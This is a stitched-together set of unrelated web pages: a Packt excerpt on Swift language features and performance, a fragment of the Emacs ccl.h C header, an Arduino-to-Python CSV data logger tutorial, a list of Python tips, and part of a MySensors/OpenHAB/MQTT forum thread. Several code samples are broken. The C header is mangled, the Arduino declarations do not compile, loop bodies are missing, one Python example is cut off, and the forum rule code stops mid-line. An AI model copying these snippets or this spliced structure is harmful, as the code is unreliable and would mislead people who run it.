must be declared using the throwskeyword after its parameters' list: func dangerous(x: Int) throws func dangerousIncrease(x: Int) throws -> Int To throw an error, use the throwkeyword: throw MyErrors.BadInstruction When you are calling a function that can throw an error, you must use the trykeyword. This indicates that a function can fail and further code will not be executed: try dangerous(10) If an error occurs, it must be caught and handled with the doand trykeywords or thrown further by declaring that function with throws: do { try dangerous(10) } catch { print("error") } Let's take a look at a code example that shows how to work with exceptions in Swift: enum Error: ErrorType { case NotNumber(String) case Empty } func increase(x: String) throws -> String { if x.isEmpty { throw Error.Empty } guard let num = Int(x) else { throw Error.NotNumber(x) } return String(num + 1) } do { try increase("10") try increase("Hi") } catch Error.Empty { print("Empty") } catch Error.NotNumber (let string) { print("\"\(string)\" is not a number") } catch { print(error) } There are many other safety features in Swift: Memory safety ensures that values are initialized before use. Two-phase initialization process with security checks Required method overriding and many others Swift has the following powerful types: Structures are flexible building blocks that can hold data and methods to manipulate that data. Structures are very similar to classes but they are value type: struct Person { let name: String let lastName: String func fullName() -> String { return name + " " + lastName } } let sara = Person(name: "Sara", lastName: "Johan") sara.fullName() Tuples are a way of grouping multiple values into one type. Values inside a tuple can have different types. Tuples are very useful for returning multiple values from a function. You can access values inside a tuple by either index or name if the tuple has named elements; or you can assign each item in the tuple to a constant or a variable: let numbers = (1, 5.5) numbers.0 numbers.1 let result: (code: Int, message: String) = (404, "Not fount") result.code result.message let (code ,message) = (404, "Not fount") Range represents a range of numbers from x to y. There are also two range operators that help create ranges: closed range operator and half-open range operator: let range = Range(start: 0, end: 100) let ten = 1...10 //Closed range, include last value 10 let nine = 0..<10 //half-open, not include 10 Enumeration represents a group of common related values. An enumeration's member can be empty, have a raw value, or have an associated value of any type. Enumerations are first-class types; they can have methods, computed properties, initializer, and other features. They are great for type-safe coding: enum Action: String { case TakePhoto case SendEmail case Delete } let sendEmail = Action.SendEmail sendEmail.rawValue //"SendEmail" let delete = Action(rawValue: "Delete") There are two very powerful value types in Swift: struct and enum. Almost all types in the Swift standard library are implemented as immutable value types using struct or enum, for example, Range, String, Array, Int, Dictionary, Optionals, and others. Value types have four big advantages over reference types, they are: Immutable Thread safe Single owned Allocated on the stack memory Value types are immutable and only have a single owner. The value data is copied on assignment and when passing it as an argument to a function: var str = "Hello" var str2 = str str += " :)" Swift is a multiparadigm programming language. It supports many different programming styles, such as object-oriented, protocol-oriented, functional, generic, block-structured, imperative, and declarative programming. Let's take a look at a few of them in more detail here. Swift supports the object-oriented programming style. It has classes with the single inheritance model, the ability to conform to protocols, access control, nested types and initializers, properties with observers, and other features of OOP. The concept of protocols and protocol-oriented programming is not new, but Swift protocols have some powerful features that make them special. The general idea of protocol-oriented programming is to use protocols instead of types. In this way, we can create a very flexible system with weak binding to concrete types. In Swift, you can extend protocols and provide a method's default implementation: extension CollectionType { func findFirst (find: (Self.Generator.Element) -> Bool) -> Self.Generator.Element? { for x in self { if find(x) { return x } } return nil } } Now, every type that implements CollectionType has a findFirst method: let a = [1, 200, 400] let r = a.findFirst { $0 > 100 } One big advantage of using protocol-oriented programming is that we can add methods to related types and use the dot ( .) syntax for method chaining instead of using free functions and passing arguments: let ar = [1, 200, 400] //Old way map(filter(map(ar) { $0 * 2 }) { $0 > 50 }) { $0 + 10 } //New way ar.map{ $0 * 2 } .filter{ $0 > 50 } .map{ $0 + 10 } Swift also supports the functional programming style. In functional languages, a function is a type and it is treated in the same way as other types, such as Int; also, it is called a first class function. Functions can be assigned to a variable and passed as an argument to other functions. This really helps to decouple your code and makes it more reusable. A great example is a filter function of an array. It takes a function that performs the actual filtering logic, and it gives us so much flexibility: // Array filter function from Swift standard library func filter(includeElement: (T) -> Bool) -> [T] let numbers = [1, 2, 4] func isEven (x: Int) -> Bool { return x % 2 == 0 } let res = numbers.filter(isEven) Swift has a very powerful feature called generics. Generics allow you to write generic code without mentioning a specific type that it should work with. Generics are very useful for building algorithms, reusable code, and frameworks. The best way to explain generics is by showing an example. Let's create a minimum function that will return a smaller value: func minimum(x: Int, _ y: Int) -> Int { return (x < y) ? x : y } minimum(10, 11) minimum(11,5, 14.3) // error This function has a limitation; it will work only with integers. However, the logic of getting a smaller value is the same for all typesâcompare them and return the smaller value. This is very generic code. Let's make our minimum function generic and work with different types: func minimum <T : Comparable>(x: T, _ y: T) -> T { return (x < y) ? x : y } minimum (10, 11) minimum (10.5, 1.4) minimum ("A", "ABC") There are two main points that Apple thought of when introducing Swift: The usage of the Cocoa framework and established Cocoa patterns Easy to adopt and migrate Apple understood that and took it very seriously while working on Swift. They made Swift work seamlessly with Objective-C and Cocoa. You can use all Objective-C code in Swift, and you can even use Swift in Objective-C. It's very crucial to be able to use the Cocoa framework. All of the code that is written in Objective-C is available for use in Swift, both Apple frameworks and third-party libraries as well. All the Cocoa frameworks written in Objective-C are available in Swift by default. You just need to import them and then use them. Swift doesn't have header files; instead, you need to use a module name. You can also include your own Swift frameworks in the same way: import Foundation import UIKit import Alamofire // Custom framework To include your own Objective-C source files, you need to do a small setup first. The process is a bit different for the application target and framework target. The main idea is the sameâto import the Objective-C header files. For the application target, you need to create a bridging header. A bridging header is a plain Objective-C header file in which you specify the Objective-C import statements. Xcode will show a popup, offering to create, and set up a bridging header for you when you add the Objective-C file to a Swift project, or vice versa for the first time. This is the best and the most convenient way to add it. If you decline the Xcode help, you can create a bridging header yourself anytime. To do that, you need to follow these steps: Add a new header file to the project. Go to Target | Build Settings. Objective-C Bridging Headerand specify the path to the bridging header file created in step 1. Once you set up bridging header, the next step is to add import statements to it: Bridging.h // // Use this file to import your target's public headers that you // would like to expose to Swift. #import "MyClass.h" For the framework target, you simply need to import the .h Objective-C header files to the framework's umbrella header. The Objective-C header files must be marked as public. The umbrella header is the header in which you specify your publicly available API. Usually, it looks like thisâthe ExampleFramework.h umbrella header: #import <UIKit/UIKit.h> //! Project version number for MySwiftKit. FOUNDATION_EXPORT double MySwiftKitVersionNumber; //! Project version string for MySwiftKit. FOUNDATION_EXPORT const unsigned char MySwiftKitVersionString[]; // In this header, you should import all the public headers of your framework using statements like #import <MySwiftKit/PublicHeader.h> #import <SimpleFramework/MyClass.h> Once you are done with the setup, you can use all Objective-C APIs in Swift. You can create instances, call methods, inherit from Objective-C classes, conform to protocols, and do other things that you can do in Objective-C. In this example, we will use the Foundation classes, but the rules are the same for third-party code as well: import UIKit import Foundation let date = NSDate() date.timeIntervalSinceNow UIColor.blackColor() UIColor(red: 0.5, green: 1, blue: 1, alpha: 1) class MyView: UIView { //custom implementation } Tip Inherit from Objective-C classes only if you need it. This can have a negative impact on performance. There is free bridging between Swift types and Objective-C Foundation types. Automatic bridging happens on assignment and when you pass it as an argument to a function: let array = [1, 2, 3] func takeArray(array: NSArray) { } var objcArray: NSArray = array takeArray(array) Converting from Objective-C to a Swift type requires explicit type casting. There are two types of casting: downcasting and upcasting. Casting is usually an unsafe operation, which could fail, and that's why it returns an optional type: //Upcasting or safe casting let otherArray: [AnyObject] = objcArray as [AnyObject] //Downcasting, unsafe casting if let safeNums = objcArray as? [Int] { safeNums[0] + 10 //11 } let string: NSString = "Hi" let str: String = string as String The String type has gone one step even further. You can invoke the Objective-C foundation methods on the Swift String type without any type casting: var name: String = "Name" name.stringByAppendingString(": Sara") Swift made a small improvement to Objective-C code so that it looks more Swift-style. The biggest change is made to instance creation and the style of the initialization code. The init, the initWith, and other factory methods are transformed into Swift initializers: //Objective-C - (instancetype)initWithFrame:(CGRect)frame; + (UIColor *)colorWithWhite:(CGFloat)white alpha:(CGFloat)alpha; // Swift init(frame: CGRect) init(white: CGFloat, alpha: CGFloat) The other change is made to NS_ENUM and NS_OPTIONS. They become native Swift types: enum and RawOptionSetType. As you can see, the API looks a bit different. Because Swift strives for cleanliness, it removes word duplications from the API nomenclature. The other method calls, properties, and names, are the same as they were in Objective-C, so it should be easy to find and understand them. What is happening behind the scenes is that Swift is generating special interface files to interact with Objective-C. You can see these Swift interface files by holding down the command key and clicking on the type, NSDate and UIColor in our example. It is also possible to use Swift in Objective-C. It makes Swift very easy to adapt to an existing project. You can start by adding one Swift file, and move more functionality to Swift over time. The setup process is much easier than that for including Objective-C in Swift. All you need to do is import Swift's autogenerated header to Objective-C. The naming convention of the files for application targets is ProductModuleName + -Swift.h, and for frameworks, it is <ProductName/ProductModuleName + -Swift.h>. Take a look at the following examples: #import "SwiftApp-Swift.h" #import <MySwiftKit/MySwiftKit-Swift.h> You can inspect the content of that autogenerated file by holding down the command key and clicking on it. By default, Swift classes aren't exposed for use in Objective-C. There are two ways of making Swift classes available in Objective-C: Mark the Swift class, protocol, or enumeration with the @objcattribute. You can mark classes, methods, protocols, and enumerations with the @objcattribute. The @objcattribute also accepts the alternative name that is used for Objective-C. When you expose a Swift class by marking it with the @objcattribute, it has to inherit from the Objective-C class, and the enumeration must have a raw Intvalue: @objc(KOKPerson) class Person: NSObject { @objc(isMan) func man() -> Bool { ... } } @objc enum Options: Int { case One case Two } Now, the KOKPersonclass with the isManmethod is available for use in Objective-C. Inherit from an Objective-C class, NSObjectfor example: When you inherit from an Objective-C class, your Swift class automatically becomes available in Objective-C. You don't need to perform any extra steps in such cases. You can also mark it with the @objcattribute and provide an alternative name: class Person: NSObject { } There are some features of Swift that are not available in Objective-C, so if you plan to use Swift code from Objective-C, you should avoid using them. Here is the complete list of these features: There are two key characteristics of code: Making the code architecture very solid and stable is the most important task, but we shouldn't forget about making it fast as well. Achieving high performance can be a tricky and dangerous task. Here are a few things that you should keep in mind while working on performance improvement: Don't optimize your code upfront There are many articles about this topic, why it's dangerous, and why you shouldn't do it. Just don't do it, and as Donald Knut says: "Premature optimization is the root of all evil" Measure first Firstly, don't optimize upfront, and secondly, measure first. Measure the code's performance characteristics and optimize only those parts that are slow. Almost 95 percent of code doesn't require performance optimization. I totally agree with these points, but there is another type of performance optimization that we should think of upfront. The small decisions that we make every day include the following: What type should it be, Intor String? Should I create a new class for a new functionality or add to an existing one? Use an array? Or maybe a set? It seems as if these don't have any impact on the application's performance, and in most cases, they don't. However, making the right decision not only improves an application's speed, but also makes it more stable. This gives higher performance in application development. The small changes that we make every day make a big impact at the end of the year. High performance is very crucial. The performance of an app is directly related to user experience. Users want to get results immediately; they don't want to wait for the view to load, see a long Loading indicator, or see a lagging animation. Every year, our computers and devices become more and more powerful, with more CPU speed, memory, storage, and storage speed. Performance problems could seem irrelevant because of this, but the software complexity increases as well. We have more complex data to store and process. We need to show animations and do a lot of other things. The first way of solving a performance problem is by adding more power. We can add more servers to handle data, but we can't update our clients' PC and mobile devices. Also, adding more power doesn't solve the code performance issue itself, but just delays it for some time. The second, and correct, solution is to remove the issue that causes the performance problem. For that, we need to identify the problem, the slow piece of the code, and improve it. There are many things that impact an application's performance and user experience. We will cover the following key metrics: Operations' performance speed Memory usage Disk space usage The most important of these and the one that has the biggest impact is the operations' performance speed. It tells us how fast a particular task can be performed, for example, creating a new user, reading from a file, downloading an image, searching for a person with a particular name, and so on. Swift is a powerful and fast programming language. In this chapter, you learned about many powerful features of Swift and how easy it is to start coding in Swift and integrate it into existing projects. We also covered why performance is important and what you should be thinking about when working with it. In the next chapter, we will do more coding in Swift, and you will learn how to use all the features of Swift to make a good application architecture.
https://www.packtpub.com/product/swift-high-performance/9781785282201
CC-MAIN-2020-40
en
refinedweb
/* Header for CCL (Code Conversion Language) interpreter. Copyright (C) 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012ndef EMACS_CCL_H #define EMACS_CCL_H #include "character.h" /* For MAX_MULTIBYTE_LENGTH */ /* { ptrdiff) /* Setup fields of the structure pointed by CCL appropriately for the execution of ccl program CCL_PROG (symbol or vector). */ extern int setup_ccl_program (struct ccl_program *, Lisp_Object); extern void ccl_driver (struct ccl_program *, int *, int *, int, int, Lisp_Object); extern Lisp_Object Qccl, Qcclp; #define CHECK_CCL_PROGRAM(x) \ do { \ if (NILP (Fccl_program_p (x))) \ wrong_type_argument (Qcclp, (x)); \ } while (0); #endif /* EMACS_CCL_H */
https://emba.gnu.org/emacs/emacs/-/blame/5ae811ddef14ea1989088c259a9ed2d14d5332b4/src/ccl.h
CC-MAIN-2020-40
en
refinedweb
What good is reading analog sensor data from an Arduino if you can’t store it for later? In this tutorial, I’m going to show you how to collect and display data from multiple analog sensors using an Arduino Uno. We’re going to create an Arduino Data Logger to generate CSV files. We’ll do this by reading multiple analog sensors on the Arduino and displaying the information to the Serial Monitor. Then, we’ll use a Python script to capture real-time data, serially, and log into a CSV (Comma Separated Value) file. At the end of this project, you’ll have a CSV file that you can use in Excel for a variety of data analytics and decision-making projects. Essentially, we’re creating a way for you to connect Arduino Sensors to Excel to capture environment data for processing. This project can be applied to many applications in Industrial Manufacturing, Smart Homes (IoT), and more. If you have a project that you want to add data logging to, then adding this Python script will allow you to strategically collect data for future analysis. Heads Up, this Project is More Advanced Props to landing on this tutorial! That means you either A) have an interesting project you want to build or B) you’re looking to gain intermediate skills with Arduino and Python. Both are great places to be in, but I want to set some expectations before you head into this tutorial. While this is an in-depth tutorial, it does require prior experience with simple analog circuits, Arduino sketches, and Python programming. That means I’ll be covering high-level steps on what you need to do to get this working. Unfortunately, I will not cover these topics in-depth. If you’re brand-new to Arduino, sensors, circuits, and coding, I highly recommend enrolling in my Level 1 course, Arduino for Beginners, before attempting to piece this project together. If you’re new to Python, here are a few Python courses I recommend checking out. You can also check out my Robotics Engineering Bundle if you’re interested in getting a taste of robotics engineering projects. Plus, you’ll gain professional skills in hardware I/O, data collection, decision-making, and mechatronics systems. Now, are you ready to get started? Step 1. Connect Analog Sensors to Arduino First, wire up the analog sensors that you want to use for this project. This project requires at least two analog sensors. I’ve chosen a rotational potentiometer and a photoresistor. Here’s the Fritzing Diagram for the circuit used in this example. The potentiometer is connected to A0 and the photoresistor is connected to A1. You can use whichever open pins you’d like. Once you have your circuit wired, it’s time to write the Arduino Sketch. Step 2. Write Arduino Sketch to Read & Send Data Serially Next, open up a new Arduino sketch and assign two global variables to pins A0 and A1 (or whatever pins your sensors are connected to). Then, begin the Serial Monitor at 9600 baud, and set these sensors as INPUTS in the setup() method. int sensor1 = A0; int sensor2 = A1; void setup(){ // put your setup code here, to run once: Serial.begin(9600); pinMode(sensor1, INPUT); pinMode(sensor2, INPUT); } Now we can develop our loop() method. Create a few globals to store data from both of the sensors. Then, use the analogRead() method to read the pin. Add a delay so that we’re not collecting data too fast. //globals int data1, int data 2; //store data from both sensors int freq = 1000; //data collection frequency ~x milliseconds void loop(){ data1 = analogRead(sensor1); data2 = analogRead(sensor2); delay(freq); } We have the data, now we need to display it on the Serial Monitor. We’re going to use the CSV format for our data, so the data should look like this: data1,data2 //globals int data1, int data 2; //store data from both sensors int freq = 1000; //data collection frequency ~x milliseconds void loop(){ data1 = analogRead(sensor1); data2 = analogRead(sensor2); //Display Data to Serial Monitor Serial.print(data1); Serial.print(","); Serial.println(data2); delay(freq); } This code works as-is, and you can upload it to your Arduino and test it out. Open a Serial Monitor, and you should have readings that look like the following. Idea A: Display Data Only if the Sensor Readings are Different Sometimes, you’ll want to impose conditions on your data collection. A good example of this is if the current reading is the same value as the previous reading. In some cases, you may not want to print out the same reading every single time. You’ll only want to log a reading if it’s different than previously. To do this, we can set some global variables equal to the current reading and then collect a new reading for comparison. //globals int curr1, int curr2; void loop(){ data1 = analogRead(sensor1); data2 = analogRead(sensor2); if (curr1 != data1 || curr2 != data2){ //Display Data to Serial Monitor Serial.print(data1); Serial.print(","); Serial.println(data2); //set the current equal to the data curr1 = data1; curr2 = data2; delay(freq); } } Idea B: Print Data based on Conditional Ranges Furthermore, sensor readings can be a bit picky and oscillate between +/- 1 of the same reading. So, if you run the code above, and you’re not happy with how it’s working, you may need to set up a conditional range. For example, you can display data if the new reading is +/- 5% of the current reading. To set this up, you can create a couple of globals to easily adjust your thresholds. 1024 comes from our analog pin, which has a 10-bit resolution. (2^10 = 1024). Therefore 5% = 1024*.05 = 51.2, which is rounded to 51. //globals float percent = 0.05; int threshold = 1024*percent; //within x% in either direction We can use this threshold in our conditional statement. //globals float percent = 0.05; int threshold = 1024*percent; //within x% in either direction void loop(){); } Rather than checking to see if the current value is different than the new value, we can check to see if the current value is greater than or equal to the new value + 5% or if the current value is less than or equal to the new value – 5%. And that’s basically it! Upload the code to your board, and open the Serial Monitor. You can adjust the percentage and frequency so that data is displayed most appropriately for your application. Idea C: Show Column Headers in the CSV File Now, this section is completely optional, but if you want to stylize your CSV file, you’ll want to send over your column headers. This is what will be displayed in the first row of Excel. I used the names of the sensors as my column headers, but you can use whatever you like. To do this, you can use some global variables to store the header names. Then, set up a loop that runs once and prints them out. Make sure you use the CSV format! I also set a boolean so that we only run this loop once. //gloabls String dataLabel1 = "Potentiometer"; String dataLabel2 = "Photoresistor"; bool label = true; void loop(){ //print out column headers while(label){ //runs once Serial.print(dataLabel1); Serial.print(","); Serial.println(dataLabel2); label=false; }); } This completes the code on the Arduino side. Feel free to make modifications or adjust it to capture things that best suit your project. Now, it’s time to move into Python and develop the code that can read and log data from our serial connection. Step 3. Develop Python Code to Read Serial Data from Arduino The third step is to create a new Python file and import the serial module. Then, set a few variables for the port the Arduino is on the baud rate, and the CSV file name. import serial arduino_port = "/dev/cu.usbmodem14201" #serial port of Arduino baud = 9600 #arduino uno runs at 9600 baud fileName="analog-data.csv" #name of the CSV file generated The Arduino serial port will be in the format “COMX” on Windows or “/dev/cu.usbmodemxxx” on Mac. Use the same address that you selected in the Arduino IDE under Tools > Port. Next, set up the serial connection and create the file. You can use the input parameter “w” to write a new file or “a” to append to an existing file. ser = serial.Serial(arduino_port, baud) print("Connected to Arduino port:" + arduino_port) file = open(fileName, "a") print("Created file") I added a few print statements to let the user know what’s happening in the code. Step 4. Create an Arduino Data Logger: Send Serial Data into a CSV File After that, you can read the serial port, parse the data, and print it to the terminal. Then, add the data to the file. #display the data to the terminal getData=str(ser.readline()) data=getData[0:][:-2] print(data) #add the data to the file file = open(fileName, "a") #append the data to the file file.write(data + "\\n") #write data with a newline #close out the file file.close() Technically, we’re finished, here but if you’d like to set the number of samples to collect, you can throw everything into a while loop, like so. samples = 10 #how many samples to collect print_labels = False line = 0 #start at 0 because our header is 0 (not real data) while line <= samples: # incoming = ser.read(9999) # if len(incoming) > 0: if print_labels: if line==0: print("Printing Column Headers") else: print("Line " + str(line) + ": writing...") getData=str(ser.readline()) data=getData[0:][:-2] print(data) file = open(fileName, "a") file.write(data + "\\n") #write data with a newline line = line+1 print("Data collection complete!") file.close() You’ll notice that I’ve added a boolean that allows you to choose if you want to display the current line number or if you want to just see raw data. This, again, is all optional, but I think it’s a nice addition. Once you have the code written, be sure to save it. I named mine read-serial.py. Step 5. How to use the Python Code for your Arduino Data Logger (CSV) It should go without saying, but make sure you have the code written from Step 2 uploaded to your Arduino before running the Python script. Additionally, be sure that your Arduino is connected to your computer’s USB port. Otherwise, none of this will work. Next, open up a terminal window, navigate to the folder where your code is saved, and run the code using the following command. python read-serial.py You should see 10 samples flow through, so long as the data has changed based on your conditions (from Step 3).You’ll also have another file called analog-data.csv added in the same directory as your Python script. You can open this file with a text editor or with Excel to view the data readings. And that’s how you get real-time readings from the Arduino Uno into Excel using Python and serial communication. I hope you found this tutorial useful for your next project! Want a copy of the code files? You can unlock a copy of all of these project files when you support us on BuyMeACoffee. What project are you working on that requires Arduino data logging? Let me know in the comments below! And, if you enjoyed this tutorial or it helped you in any way, please consider sending. One comment This content is well-detailed and easy to understand. Thank you for creating good content!
https://www.learnrobotics.org/blog/arduino-data-logger-csv/
CC-MAIN-2020-40
en
refinedweb
Python is a language known for its simplicity and clean syntax. Python programs usually have lesser lines of code than other programming languages. Now, lets learn some Python tips and tricks to make your code even more readable and shorter. To download these Python tips and tricks as PDF, skip to the bottom of this post. 1. Python program to swap two numbers This is one of the basic programs every newbie programmers will learn. The most common way of swapping two variables by using a third variable. In fact, there are a couple of other ways to swap two numbers. 1. Using a third variable a = 5 b = 6 c = a a = b b = c 2. The Pythonic way a, b = 5, 6 a, b = b, a 2. Reverse of a string x = "Hello World" print(x[::-1]) Output: dlroW olleH 3. Python program to generate a list of numbers up to x limit = int(input("Enter the limit: ")) l = [x for x in range(limit+1)] print(l) This is known as list comprehension. Output: Enter the limit: 5 [0, 1, 2, 3, 4, 5] 4. Python assignment expression) 5. Multiply a string Hey, you can multiply strings in Python. print("Geekinsta " * 3) Output: Geekinsta Geekinsta Geekinsta 6. Sort a list based on custom key Following) 7. Check if a string exists in another string There are several methods to do this. x = "Hi from Geekinsta" substr = "Geekinsta" # Method 1 if substr in x: print("Exists") # Method 2 if x.find(substr) >=0: print("Exists") # Method 3 if x.__contains__(substr): print("Exists") 8. Shuffle the items of a list How do you usually shuffle the items in a list? Most of the Python beginners will be using a loop to iterate over the list and shuffle the items. But python has an inbuilt method to shuffle list items. To use this method, we should first import random module. from random import shuffle l = [1, 2, 3] shuffle(l) print(l) You will get different outputs each time you run the code. 9. Create string from a list With the join method Python, we can easily convert the items of a list to string. l = ['Join', 'this', 'string'] print(str.join(' ', l)) 10. Pass list items as arguments In Python, you can pass the elements of a list as individual parameters without specifying it manually by index using the * operator. This is also known as unpacking. l = [5, 6] def sum(x, y): print(x + y) sum(*l) 11. Flatten a list of lists Usually, we flatten a list of lists using a couple of nested for loops. Although this method works fine, it makes our code larger. So, here’s a shorter method to flatten a list using the itertools module. import itertools a = [[1, 2], [3, 4]] b = list(itertools.chain.from_iterable(a)) print(b) 12. Interchanging keys and values of a Dictionary Python allows you to easily swap the keys and values of a dictionary using the same syntax we use for dictionary comprehension. Here’s an example. d = {1: 'One', 2: 'Two', 3: 'Three'} di = { v:k for k, v in d.items()} print(di) 13. Using two lists in a loop We normally use the range() function or an inerrable object to create a for loop. We can also create a for loop with multiple interactable objects using the zip() function. keys = ['Name', 'age'] values = ['John', '22'] for i, j in zip(keys, values): print(f'{i}: {j}') 14. Create a dictionary from two lists We can combine the elements of two lists as key-value pairs to form a dictionary. Here’s an example. keys = ['Name', 'age'] values = ['John', '22'] d = {k:v for k, v in zip(keys, values)} print(d) 15. Pass dictionary items as a parameter The key-value pairs of a dictionary can be directly passed as named parameters to any function in the same way we passed a list before. d = {'age': 25, 'name': 'Jane'} def showdata(name, age): print(f'{name} is {age} years old') showdata(**d) Download Python Tips and Tricks PDF We’ll be regularly updating this article more such tips and tricks to make your code shorter and readable.
https://www.geekinsta.com/python-tips-and-tricks/
CC-MAIN-2020-40
en
refinedweb
If we now navigate to our new Skill, we can see that it is made up of a number of files and folders. $ ls -ltotal 20drwxr-xr-x 3 kris kris 4096 Oct 8 22:21 dialog-rw-r--r-- 1 kris kris 299 Oct 8 22:21 __init__.py-rw-r--r-- 1 kris kris 9482 Oct 8 22:21 LICENSE-rw-r--r-- 1 kris kris 283 Oct 8 22:21 README.md-rw-r--r-- 1 kris kris 642 Oct 8 22:21 settingsmeta.yamldrwxr-xr-x 3 kris kris 4096 Oct 8 22:21 vocab We will look at each of these in turn. The dialog, vocab, and locale directories contain subdirectories for each spoken language the skill supports. The subdirectories are named using the IETF language tag for the language. For example, Brazilian Portugues is 'pt-br', German is 'de-de', and Australian English is 'en-au'. By default, your new Skill contains one subdirectory for United States English - 'en-us'. If more languages were supported, then there would be additional language directories. $ ls -l dialogtotal 4drwxr-xr-x 2 kris kris 4096 Oct 8 22:21 en-us There will be one file in the language subdirectory (ie. en-us) for each type of dialog the Skill will use. Currently this will contain all of the phrases you input when creating the Skill. $ ls -l dialog/en-ustotal 4-rw-r--r-- 1 kris kris 10 Oct 8 22:21 first.dialog When instructed to use a particular dialog, Mycroft will choose one of these lines at random. This is closer to natural speech. That is, many similar phrases mean the same thing. For example, how do you say 'goodbye' to someone? Bye for now See you round Catch you later Goodbye See ya! Each Skill defines one or more Intents. Intents are defined in the vocab directory. The vocab directory is organized by language, just like the dialog directory. We will learn about Intents in more detail shortly. For now, we can see that within the vocab directory you may find multiple types of files: .intent files used for defining Padatious Intents .voc files define keywords primarily used in Adapt Intents .entity files define a named entity also used in Adapt Intents In our current example we might see something like: $ ls -l vocab/en-ustotal 4-rw-r--r-- 1 kris kris 23 Oct 8 22:21 first.intent This .intent file will contain all of the sample utterances we provided when creating the Skill. This directory is a newer addition to Mycroft and combines dialog and vocab into a single directory. This was requested by the Community to reduce the complexity of a Skills structure, particularly for smaller Skills. Any of the standard file types that we've looked at so far will be treated the same if they are contained in the dialog, vocab, or locale directories. This also includes the regex directory that you will learn about later in the tutorial. The __init__.py file is where most of the Skill is defined using Python code. We will learn more about the contents of this file in the next section. Let's take a look: from adapt.intent import IntentBuilderfrom mycroft import MycroftSkill, intent_file_handler, intent_handler This section of code imports the required libraries. Some libraries will be required on every Skill, and your skill may need to import additional libraries. The class definition extends the MycroftSkill class: class HelloWorldSkill(MycroftSkill): The class should be named logically, for example "TimeSkill", "WeatherSkill", "NewsSkill", "IPaddressSkill". If you would like guidance on what to call your Skill, please join the ~skills Channel on Mycroft Chat. Inside the class, methods are then defined. This method is the constructor. It is called when the Skill is first constructed. It is often used to declare state variables or perform setup actions, however it cannot utilise MycroftSkill methods as the class does not yet exist. You don't have to include the constructor. An example __init__ method might be: def __init__(self):super().__init__()self.already_said_hello = Falseself.be_friendly = True Perform any final setup needed for the skill here. This function is invoked after the skill is fully constructed and registered with the system. Intents will be registered and Skill settings will be available. def initialize(self):my_setting = self.settings.get('my_setting') Previously the initialize function was used to register intents, however our new @intent_handler and @intent_file_handler decorators are a cleaner way to achieve this. We will learn all about the different Intents shortly. In our current HelloWorldSkill we can see two different styles. An Adapt handler, triggered by a keyword defined in a ThankYouKeyword.voc file. @intent_handler(IntentBuilder('ThankYouIntent').require('ThankYouKeyword'))def handle_thank_you_intent(self, message):self.speak_dialog("welcome") A Padatious intent handler, triggered using a list of sample phrases. @intent_file_handler('HowAreYou.intent')def handle_how_are_you_intent(self, message):self.speak_dialog("how.are.you") In both cases, the function receives two parameters: self - a reference to the HelloWorldSkill object itself message - an incoming message from the messagebus. Both intents call the self.speak_dialog() method, passing the name of a dialog file to it. In this case welcome.dialog and how.are.you.dialog. You will usually also have a stop() method. This tells Mycroft what your Skill should do if a stop intent is detected. def stop(self):pass In the above code block, the pass statement is used as a placeholder; it doesn't actually have any function. However, if the Skill had any active functionality, the stop() method would terminate the functionality, leaving the Skill in a known good state. The final code block in our Skill is the create_skill function that returns our new Skill: def create_skill():return HelloWorldSkill() This is required by Mycroft and is responsible for actually creating an instance of your Skill that Mycroft can load. Please note that this function is not scoped within your Skills class. It should not be indented to the same level as the methods discussed above. This file contains the full text of the license your Skill is being distributed under. It is not required for the Skill to work, however all Skills submitted to the Marketplace must be released under an appropriate open source license. The README file contains human readable information about your Skill. The information in this file is used to generate the Skills entry in the Marketplace. More information about this file, can be found in the Marketplace Submission section. This file defines the settings that will be available to a User through their account on Home.Mycroft.ai. Jump to Skill Settings for more information on this file and handling of Skill settings. You have now successfully created a new Skill and have an understanding of the basic components that make up a Mycroft Skill.
https://mycroft-ai.gitbook.io/docs/skill-development/skill-structure
CC-MAIN-2020-24
en
refinedweb
OpenHAB/MQTT Tips & Hints This topic was split off to discuss tips and hints specific to using MySensors together with MQTT middleware and OpenHAB. If you made something nice using this combination or have some questions/issues please post them in here! @kolaf I just started experimenting with openhab and find it quite hard to get started. There's some documentation ( far from complete, especially when you're just starting) but the general impression is that it's very powerful, mainly due to all the programming options. I'm quite sure you could directly talk to a mysensors gateway using the serial protocol, using e.g. rules, if you want. I doubt however if you want to write your own protocol handler... Anyway, I'm currently using an Ethernet gateway which tasks to a Perl script I wrote () that does the conversion to and from MQTT. This script is a MQTT client that runs on the same server I run openhab and the mosquitto broker on. This is the only difference compared to @Damme solution who runs a broker on the gateway. I like the flexibility of storing & accessing all data through an MQTT broker which makes up for the apparent overkill going through MQTT just to connect mysensors to openhab. As long as your server has enough resources to run it all its not really worth the effort to directly talk to my sensors or create an openhab binding for it. how do you use the mqtt binding to talk to the sensors? I'm not at my PC right now so I can't add any actual code, but let's take the switch as an example. A sensor (with say, id 100) which has the switch connected sends a 1 when pressed and a 0 when released to the gateway, with child I'd 7. This comes out the gateway and is picked up by the perl script. The script publishes this to /mysensors/100/7/V_LIGHT. You define a switch item in openhab which subscribes to this topic. To read the state of the switch openhab expects either ON or OFF from MQTT instead of 1 or 0 sent by the sensor. I could have changed this on the sensor side, but I choose to implement a map-transformation on the openhab-side. Now the state of the switch changes to ON when pressed on the sensor.. Good idea. If someone made a good, or at least workable and well-documented, solution than I am sure this project would be much utilised by the openHAB crowd as well. Maybe explaining it to me could be a good start for a how to/guide which could also be utilised in their wiki? I hope I'm not stepping on any Vera toes when saying this? I hope I'm not stepping on any Vera toes when saying this? Not everybody owns a vera and IMHO it's only beneficial for this project when multiple home automation systems are supported. Finding a greatest common divider for e.g. the types of variables will only improve things. - kolaf Hero Member last edited by kolaf @Yveaux good, I agree, and I am glad to hear it. How would you solve a toggle switch? The sensor does not know whether the light is on or off since it may be toggled through the controller separately. This means that in my head it will simply send "on" every time and it is up to the item/map to figure out whether it should be turned on or off depending on its current state. I guess this may be required as a rule. Or does your server support sending items dated back to the sensor so that it knows whether the light is off or on currently? In that case it can make the decision itself and send the correct on or off command. Maybe I should ask this question in the openhab group... @kolaf : I´m not very experienced in Java, so the code reflects my missing knowledge and is much longer than it should be. The purpose of "Split Message" is to split multilpe messages into single messages and afterward split this single messages into useful informations to set the OpenHAB items accordingly. First part: common declarations import org.openhab.core.library.types.* import org.openhab.core.persistence.* import org.openhab.model.script.actions.* var String[] buffer var String[] linebuffer var int SensorID var int transmissions_old = 0 var int transmissions_new = 0 var int transmissions_missed = 0 var int RadioID Second part: Splitting multiple Messages rule SplitMessage when Item 